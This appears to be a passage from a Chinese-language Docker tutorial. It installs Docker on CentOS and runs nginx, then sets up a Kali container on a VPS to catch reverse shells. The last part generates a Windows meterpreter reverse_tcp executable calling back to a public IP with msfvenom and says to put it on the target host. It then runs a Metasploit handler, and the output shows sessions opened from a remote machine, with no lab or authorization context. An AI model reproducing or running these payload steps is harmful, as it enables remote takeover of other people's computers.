2. 配置yum源

wget https://mirrors.ustc.edu.cn/docker-ce/linux/centos/docker-ce.repo -O /etc/yum.repos.d/docker-ce.repo
yum clean all; yum makecache fast       --重新刷新yum源

3. 安裝與啟動docker

yum -y install docker-ce
systemctl restart docker
systemctl enable docker     開機自啟

4. 搜索與安裝容器

4.1 以 nginx 為例

docker search nginx   搜索
docker pull nginx     安裝nginx

4.2 啟動 nginx

docker run --name web1 -d -p 80:80 nginx
--name ：表示啟動的名字
-d： daemon，守護進程
-p：設置映射端口
驗證頁面，輸入網址即可訪問

對頁面進行修改：

docker exec -it web1 /bin/bash    進入容器
root@3e93e119b79c:/# cat /usr/share/nginx/html/ 
50x.html    index.html
root@3e93e119b79c:/# echo "<h1>test nginx page<h1>" > /usr/share/nginx/html/index.html
使用exit退出，這時刷新之前的網頁，nginx的歡迎頁面就變成上面修改的內容了。
 

5. 安裝外網kali

先搜索

docker search kali

安裝

docker pull booyaabes/kali-linux-full

使用

[root@vultr ~]# docker image ls
REPOSITORY                  TAG                 IMAGE ID            CREATED         SIZE
booyaabes/kali-linux-full   latest              4bffca040c1c        6 hours ago         8.31GB
nginx                                 latest              bc26f1ed35cf        16 hours ago        109MB
[root@vultr ~]# docker run -it 4bffca040c1c
root@c5785446988a:/# cat /etc/os-release 
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2018.4"
VERSION_ID="2018.4"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="https://www.kali.org/"
SUPPORT_URL="https://forums.kali.org/"
BUG_REPORT_URL="https://bugs.kali.org/"
 

直接使用即可。
如果需要監聽端口，實現連接反彈shell

docker run -p 4444:4455 -it booyaabes/kali-linux-full

使用docker映射容器4455端口到local上的4444端口

[root@vultr ~]# docker container ls
CONTAINER ID        IMAGE                       COMMAND                   CREATED             STATUS              PORTS                    NAMES
8612e672d5db        booyaabes/kali-linux-full   "/bin/sh -c \"/bin/ba…"   2 minutes ago       Up 2 minutes        0.0.0.0:4444->4455/tcp   hungry_goldberg

[root@vultr ~]# docker attach 8612e672d5db   進入kali容器之中

制作payload（使用本地的kali制作payload）

root@kal:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=149.248.8.210 LPORT=4444 -f exe > test.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes

將exe文件放到目標主機上
在kali容器中運行msf

[root@vultr ~]# docker attach 9b2fcb0c1d21
root@9b2fcb0c1d21:/# msfconsole 

         ,           ,
        /                  ((__---,,,---__))
            (_) O O (_)_________
                 \ _ /            |                    o_o \   M S F   |                              \   _____  |  *
                                |||   WW|||
                                |||     |||

             =[ metasploit v4.17.14-dev                         ]
+ -- --=[ 1809 exploits - 1030 auxiliary - 313 post       ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 149.248.8.210
lhost => 149.248.8.210
msf exploit(multi/handler) > set lport 4455
port => 4455
msf exploit(multi/handler) > run 
[-] Handler failed to bind to 149.248.8.210:4455:-  -
[*] Started reverse TCP handler on 0.0.0.0:4455 
[*] Sending stage (179779 bytes) to 42.90.91.248
[*] Meterpreter session 1 opened (172.17.0.3:4455 -> 42.90.91.248:11526) at 2018-09-26 09:39:23 +0000
[*] Sending stage (179779 bytes) to 42.90.91.248
[*] Meterpreter session 2 opened (172.17.0.3:4455 -> 42.90.91.248:11528) at 2018-09-26 09:39:25 +0000

meterpreter > 

這樣就拿到了反彈shell

docker借鑒學習：https://yeasy.gitbooks.io/docker_practice/image/

docker使用教程